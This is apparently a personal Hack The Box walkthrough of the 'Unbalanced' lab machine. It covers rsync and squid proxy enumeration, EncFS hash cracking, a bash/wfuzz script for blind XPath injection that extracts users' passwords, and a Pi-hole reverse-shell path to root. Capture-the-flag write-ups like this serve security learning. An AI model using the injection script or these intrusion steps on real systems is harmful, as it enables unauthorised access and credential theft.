Unbalanced — Hack the box Walkthrough
Hello infosec community
Hope you are doing well in these tough pandemic times. This time i am presenting the walkthrough of my first Hard machine on hack the box which is unbalanced. It was a very interesting box, one must give it a shot. Ohkay, without any further ado, lets hack this box 😉
Methodology applied
- scanning
- enumerating rsync
- worked on squid proxy
- exploited the login page
- got into a third box
- privesc of main box
NOTE: the last two may sound confusing, as this is not generally the case, but trust me, this is the most interesting part of the walkthrough. Stay tuned.
Scanning
Used nmap, scanning ports.
-sC : default scripts
-sV : enumerate versions
-v : verbose
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #nmap -sC -sV -v 10.10.10.200
we have ssh, rsync and squid proxy running here.
Enumeration
lets first go for rsync.
viewing the availables folders on rsync:
┌─[✗]─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #rsync rsync://10.10.10.200:873 -a --list-only
conf_backups EncFS-encrypted configuration backupswe have three shares here, out of which we had access to conf_backups only, so mounting that directory.
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #mkdir rsync
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #rsync rsync://10.10.10.200:873/conf_backups -a rsync/
we see we have some files whose names seem to be arbitrary strings. But when we try to view all files then we have an interesting file, as shown below.
After studying about it, one thing is for sure that this is an encrypted file system which needs to be decrypted in order to obtain the human readable format.
we use encfs2john which gets the hash out of this system, which will further be cracked. (this tool can be found in /usr/share/john/encfs2john.py)
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #python encfs2john.py rsync/ > enc.john
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #cat enc.john
rsync/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887addwe have the hash here. Lets crack it.
AND we have the password for the encrypted system, bubblegum. Lets see, what has it got for us.
─[✗]─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #encfs --forcedecode /root/mine/HTB/unbalanced/rsync/ /root/mine/HTB/unbalanced/decrypted/
EncFS Password:
Here we have a bunch of configuration files for us out of which squid.conf, is the one worth having a look at, as we have the similar service running on the system. After doing a little research on this part, figured out, squidclient is the tool which will show us the further path.
A little insight before working with this tool: This client tool allows us to make queries to the cache manager of the squid proxy. To make the queries, you need password, which is given in the file. Webmaster is the default cache manager present here. Also in the “mgr:COMMAND” , the COMMAND is among the queries which can be performed here, and which can be found in the config file.
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -p 3128 -w 'Thah$Sh1' mgr:fqdncachewe are basicallly making a query to see the cache of this proxy server and we see, some interesting entries there.
highlighted are those hosts which can be accessed only when we set 10.10.10.200:3128 as our proxy.
So we update our /etc/hosts file likewise and set the proxy and then we hit those 3 domains then , we get the same login page.
NOTE: Now this is most CTFish thing, about the box, even i had to refer to forum for this. The thing is, we see IP 172.31.179.2 and 172.31.179.3 so it can be concluded that 172.31.179.1 is missing.
after hitting those on browser , with 10.10.10.200:3128 as proxy, we get the following:
and yess, our instinct was right, we see a message telling us that its under maintenance, so its most likely to be vulnerable and this is our target. We get the same login page, on http://172.31.179.1/intranet.php.
Now after a lot of study, research , banging of head against the wall and going through forums, i came to know that its vulnerable to something called x-path injection.
here are some resources, where you can make yourself aware of the topic:
- https://portswigger.net/kb/issues/00100600_xpath-injection
- https://book.hacktricks.xyz/pentesting-web/xpath-injection
- https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b
- https://owasp.org/www-community/attacks/XPATH_Injection
first we use the most basic payload, which is ‘ or ‘a’=’a .
when we do this, we get a list of four users. Now let me give you a little insight behind my exploit :
#!/bin/bash
arr=("rita" "jim" "bryan" "sarah")
for j in ${arr[@]}
do
for i in {1..20}
do
echo "for $i character of password: "
wfuzz -w payload -p 10.10.10.200:3128:HTTP -u http://172.31.179.1/intranet.php -d "Username=$j' and substring(Password,$i,1)='FUZZ' or '&Password=fuck" --hh 6756 | sed '2,13d' | sed '6,10d'
echo "================================"
done
donea file payload is used , whose contents are:
(output of the following script + some basic special characters like !@#$%^&*())
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
0
1
2
3
4
5
6
7
8
9
!
@
#
$
%
^
&
*
(
)
_this payload can be smartly generated by , the following script and append it with special characters:
#!/bin/bash
for i in {{a..z},{A..Z},{0..9}}
do
echo $i
donenow the attack goes like, since we know it is XPath we can start to try some other enumeration — for example we could check to see if any users have “password” as their password.
'or substring(Password,1,1)='p' or''or substring(Password,2,1)='a' or'
The first returns all the user accounts with p as the first letter of their password. The second returns all user accounts with a as the second letter of their password.
i modified the query string with “and” and thus forming the exploit. AFter runnin the exploit, we get the following output:
rita: password01!
jim : stairwaytoheaven
bryan: ireallyl0vebubblegum!!! → valid creds for ssh
sarah: sarah4evah
so we ssh using ‘bryan: ireallyl0vebubblegum!!!’
to check connected devices used the following command:
bryan@unbalanced:~$ ip n
10.10.10.2 dev ens160 lladdr 00:50:56:b9:6d:8f REACHABLE
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE
fe80::250:56ff:feb9:6d8f dev ens160 lladdr 00:50:56:b9:6d:8f router STALEthe above could also be seen on keen observation of output of linpeas.sh
got this another host (172.31.11.3) connected to it. Open it on browser with proxy set, and got this pi-hole login page:
tried random password ‘admin’ and it worked. Also we see at the bottom, its running version 4.3.2. And now if we go and look for its exploit, then this article , appeared to be quite useful.
Now you can , follow this article and get root on the box.
Following are the screenshots of how to compromise the pi-hole server:
(in the article, they have first show you how to get low-privileged shell first , but here i am going directly for the root-shell)
1. editng the settings → blocklist
2. setting listener on
3. after you do the above, get back on browser and click “update” with the listener on again on same port 80
4. now send your reverse shell payload on listener
5. getting root shell of pi-hole server
now that we have root of pi-hole, lets enumerate to see where it takes us. (pardon me , i was being too lazy to convert it into proper tty shell)
On the home directory of root, we see these two files, and on opening the pihole_config.sh, we see a passsword.
root@pihole:~# ls
ls
ph_install.sh
pihole_config.sh
root@pihole:~# cat pihole_config.sh
lets try to ssh root into unbalanced , with this password, but you will see that, we can not directly ssh into root,we first login in as byan and then change to root.
and boom!!! we have just owned the machine!
Now, while doing this box , i had a lot of help from hack the box forum, as i am still a noob and learning things. This was my first writeup on a hack the box machine, Hope you guyz, learned something from it. And if you find anything wrong or inappropriate then constructive criticism is always welcomed!!
HAPPY HACKING, fellas!!!
